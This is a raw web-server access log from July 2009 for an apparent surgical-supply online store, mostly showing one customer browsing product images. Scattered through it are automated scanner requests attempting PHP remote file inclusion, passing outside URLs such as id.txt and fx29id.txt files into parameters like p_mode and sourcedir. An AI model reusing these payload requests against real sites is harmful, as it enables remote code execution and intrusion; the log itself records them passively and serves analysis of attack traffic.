68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:47 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:49 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:50 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:07:50 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
194.183.86.220 - - [13/Jul/2009:01:07:56 -0400] "GET /logs/access_log.Q109060600%20%20/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:08:14 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
80.190.200.18 - - [13/Jul/2009:01:08:40 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
68.123.155.181 - - [13/Jul/2009:01:08:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG HTTP/1.1" 200 59460 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:08:51 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:08:51 -0400] "GET /images/items/0034196_THUMB.JPG HTTP/1.1" 200 2152 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:08:51 -0400] "GET /images/items/9600305_THUMB.JPG HTTP/1.1" 200 3031 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:08:51 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:23 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG HTTP/1.1" 200 61587 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4D12F4D800440106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:25 -0400] "GET /images/items/3232000_THUMB.JPG HTTP/1.1" 200 1058 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:25 -0400] "GET /images/items/3231000_THUMB.JPG HTTP/1.1" 200 3373 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:25 -0400] "GET /images/items/3233000_THUMB.JPG HTTP/1.1" 200 1941 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:25 -0400] "GET /images/items/3231001_THUMB.JPG HTTP/1.1" 200 939 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:26 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:26 -0400] "GET /images/items/3231003_THUMB.JPG HTTP/1.1" 200 1116 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:26 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.18.107.20 - - [13/Jul/2009:01:09:34 -0400] "GET /logs/error_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
209.18.107.20 - - [13/Jul/2009:01:09:34 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
209.18.107.20 - - [13/Jul/2009:01:09:34 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.die-grenzreiter.com/content/download/pw.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
68.123.155.181 - - [13/Jul/2009:01:09:47 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4C1D842800D5F106X+M37+ENG HTTP/1.1" 200 47088 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4F1454C80070D106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:48 -0400] "GET /images/prev.gif HTTP/1.1" 200 253 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4C1D842800D5F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:09:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG HTTP/1.1" 200 61587 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB4C1D842800D5F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:03 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L3128AB4C1DE4780040A106X+WSEQ(S0060):1+OUITEM(A0200):3232000 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:03 -0400] "GET /images/items/3232000_FULL.JPG HTTP/1.1" 200 3467 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L3128AB4C1DE4780040A106X+WSEQ(S0060):1+OUITEM(A0200):3232000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:08 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
86.35.0.115 - - [13/Jul/2009:01:10:09 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
68.123.155.181 - - [13/Jul/2009:01:10:21 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:32 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:34 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:10:40 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.59.12.99 - - [13/Jul/2009:01:11:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
68.123.155.181 - - [13/Jul/2009:01:11:57 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:00 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:12 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
87.229.45.106 - - [13/Jul/2009:01:12:23 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.229.45.106 - - [13/Jul/2009:01:12:23 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
87.229.45.106 - - [13/Jul/2009:01:12:23 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
86.35.0.115 - - [13/Jul/2009:01:12:24 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:12:24 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:12:24 -0400] "GET /logs/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 9324 "-" "libwww-perl/5.810"
87.229.45.106 - - [13/Jul/2009:01:12:27 -0400] "GET /logs/error_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://digitalflutterby.com/read/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
68.123.155.181 - - [13/Jul/2009:01:12:57 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L3128AB4C1DE4780040A106X+WSEQ(S0060):1+OUITEM(A0200):3232000 HTTP/1.1" 200 27010 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
68.123.155.181 - - [13/Jul/2009:01:12:58 -0400] "GET /images/items/3232000_FULL.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L3128AB4C1DE4780040A106X+WSEQ(S0060):1+OUITEM(A0200):3232000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
70.87.64.234 - - [13/Jul/2009:01:13:35 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.87.64.234 - - [13/Jul/2009:01:13:36 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.101.70.1 - - [13/Jul/2009:01:13:40 -0400] "GET /logs/access_log.Q109070600//yabbse/poc.php?sourcedir=http://articlecentralstation.com/ab.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
86.35.0.115 - - [13/Jul/2009:01:13:42 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
68.123.155.181 - - [13/Jul/2009:01:13:52 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3128AB431C746800F8F106X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
86.35.0.115 - - [13/Jul/2009:01:14:00 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:14:00 -0400] "GET /?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
86.35.0.115 - - [13/Jul/2009:01:14:00 -0400] "GET /logs/?sourcedir=http://my-1.com/tcache/id.txt??? HTTP/1.1" 200 9324 "-" "libwww-perl/5.810"
70.87.64.234 - - [13/Jul/2009:01:14:10 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://fcbarcelonanyc.com/help/idxx.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
